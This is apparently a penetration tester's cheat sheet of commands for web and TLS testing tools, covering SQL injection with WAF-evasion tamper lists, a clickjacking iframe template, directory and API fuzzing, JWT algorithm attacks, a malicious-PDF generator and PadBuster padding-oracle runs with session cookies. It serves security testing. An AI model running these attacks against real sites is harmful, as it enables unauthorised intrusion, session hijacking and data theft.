by TestSSL
https://github.com/drwetter/testssl.sh
./testssl.sh -f client.cloudfront.net > testSSL.txtSSLyze
https://github.com/nabla-c0d3/sslyze
# Test for session renegotiation
sslyze --reneg client.cloudfront.net > sslyze_reneg.txtSmuggler
https://github.com/defparam/smuggler
python3 ./smuggler.py -u client.cloudfront.net > smuggler.txtOpenSSL
https://github.com/openssl/openssl
# Check for Weak Diffie-Hellman Parameters
openssl s_client -connect client.com:443 -cipher "EDH" 2>/dev/null | grep "Server Temp Key"
# Check OCSP Stapling
openssl s_client -connect google.com:443 -status -servername google.comSSLScan
https://github.com/openssl/openssl
sslscan technoherder.com
# 3DES Cipher Suites Enabled
sslscan fakePentest.com | grep DESYAWAST
https://github.com/adamcaudill/yawast
docker pull adamcaudill/yawast && docker run --rm -it adamcaudill/yawast scan technoherder.com —-tdessessioncountSQLMap
https://github.com/sqlmapproject/sqlmap
python3 ./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent —threads=5
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent --tamper="between,randomcase,space2comment" -v 3 -p subject —dbms MySQL
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent
./sqlmap.py -r request.txt -p ‘JSON username’ --risk=3 --level=5 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
./sqlmap.py -r request.txt -p ‘JSON username’ --risk=3 --level=5 --cookie=“_gcl_au=1.1.737317960.1647528948; _ga_4MGG2VTTQ7=GS1.1.1647954525.11.1.1647956818.49; _ga=GA1.1.696811828.1647528949; _fbp=fb.1.1647528949554.985154512; one-cookie=someValue”
./sqlmap.py -r request.txt -p ‘JSON entityType’ --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
./sqlmap.py --risk=3 --level=5 --random-agent -u "testing.io/gateway/v1/transactions/batches/test*/purchases/15cc333a-7c6f-46cd-bb6c-a0aa0a367e95" --headers="Authorization: Bearer eyJhbG”Tamper scripts
MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
NoSQLMap
docker pull sdcampbell/nosqlmap && docker run --rm -ti sdcampbell/nosqlmapClickJacking
Change opacity to 0.0001 for malicious intent:
<style>
iframe {
position:relative;
Width:900;
height: 900;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
Top:500;
left:400;
z-index: 1;
}
</style>
<div>Test me</div>
<iframe src="$url"></iframe>Gobuster
https://github.com/OJ/gobuster
# Use -k switch to ignore SSL check
# Use -z switch to hide the progress bar
gobuster dns -d targetDomainName -w /path/wordList
gobuster dir -u targetUrl -w wordList
gobuster dir -u https://technoherder.com/path/to/folder -c 'session=123456;other=xyz' -t 50 -w common-files.txt -x .php,.html
gobuster dir -u https://technoherder.io -w ~/wordlists/shortlist.txt —exclude-length 4587
gobuster dir -u https://technoherder.io -w ~/wordlists/shortlist.txt -q -n -e
gobuster dns -d technoherder.com -w ~/wordlists/subdomains.txt -i
gobuster fuzz -u https://technoherder.com?FUZZ=test -w parameter-names.txt
gobuster fuzz -u https://technoherder.io/gateway/v1/transactions/batches/test/purchases/actions/FUZZ/ -w API_Endpoints -H "Authorization: Bearer tokenValue" -b 404
gobuster fuzz -u https://testing.io/gateway/v1/transactions/batches/ -w API_Endpoints -H "Authorization: Bearer tokenValue" -b 404Dirsearch
https://github.com/maurosoria/dirsearch
dirsearch % python3 dirsearch.py -u kmsparallel.com -e aspx,cs,html
# Simple usage
python3 dirsearch.py -u https://target
python3 dirsearch.py -e php,html,js -u https://target
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlistWfuzz
https://github.com/xmendez/wfuzz
docker run -v $(pwd)/wordlist:/wordlist/ -it ghcr.io/xmendez/wfuzz wfuzzdnscaa
https://github.com/weppos/dnscaa
Follow these instructions to install dnscaa:
apt-get update && apt-get install golang
mkdir ~/gogit clone https://github.com/weppos/dnscaa.git
cd dnscaa
go mod init github.com/weppos/dnscaa
go mod tidy
go build cmd/digcaa/digcaa.go
# To run CAA tool:
./digcaa google.comMalicious PDF Generator
https://github.com/jonaslejon/malicious-pdf
Usage
python3 malicious-pdf.py burp-collaborator-urlOutput will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.
Do not use the https:// etc prefix on the url argument
Assetfinder
https://github.com/tomnomnom/assetfinder
Install
If you have Go installed and configured (i.e. with $GOPATH/bin in your $PATH):
go get -u github.com/tomnomnom/assetfinderOtherwise download a release for your platform. To make it easier to execute you can put the binary in your $PATH.
Usage
assetfinder [--subs-only] <domain>Kiterunner
https://github.com/assetnote/kiterunner
# build the binary
make build
# symlink your binary
ln -s $(pwd)/dist/kr /usr/local/bin/kr
# compile the wordlist
# kr kb compile <input.json> <output.kite>
kr kb compile routes.json routes.kite
# scan away
kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053JWT
# Simple decode
$ python3 jwt_tool.py <JWT>
# Changes alg to None
python3 jwt_tool.py <<JWT_TOKEN>> -X a
# DIRTY ALL CHECKS
python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" -rh "Authorization: Bearer eyJhbG...<JWT Token>"Sign JWT with Public Cert after using HS256 ALG
(if works, you can change the values!)
# Get public key
openssl s_client -connect <hostname>:443
# Copy the server certificate into a new file
nano cert.perm
-----BEGIN CERTIFICATE-----
MIIGJTCCBQ2gAwIBAgIQDDaea1XwVFbuw0e+PqAE5TANBgkqhkiG9w0BAQsFADBG
MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRUwEwYDVQQLEwxTZXJ2ZXIg
-----END CERTIFICATE-----
# Then
python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk <<PUBKEY.PEM>>
python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk cert.pemOpenVAS
https://github.com/greenbone/openvas-scanner
docker run -d -p 443:443 --name openvas mikesplain/openvas
https://127.0.0.1/login/login.html
Username: admin
Password: adminPadBuster
# install on Kali
sudo apt-get install padbuster
# Pass in cookies and value
┌──(kali㉿kali)-[~]
└─$ padbuster https://example.com/Admin/Index 2505B841676B218E241A3E6CDBBCDCF27F721D3220D5EE23C44A54A1B0F9FE1D7439EA1D37F6478E2F1F56B97FC46A665BA18E2EDA37A9B72FC6E555AFB0C721B94E94A65F6FD6D0262A3FD195A27A02BBC8024B47C1E3ECDF714E3187D68DEE 8 -cookies 'ASP.NET_SessionId=3zrjluarj5nkig4kmp5qi20w;.ASPXFORMSAUTH=2505B841676B218E241A3E6CDBBCDCF27F721D3220D5EE23C44A54A1B0F9FE1D7439EA1D37F6478E2F1F56B97FC46A665BA18E2EDA37A9B72FC6E555AFB0C721B94E94A65F6FD6D0262A3FD195A27A02BBC8024B47C1E3ECDF714E3187D68DEE'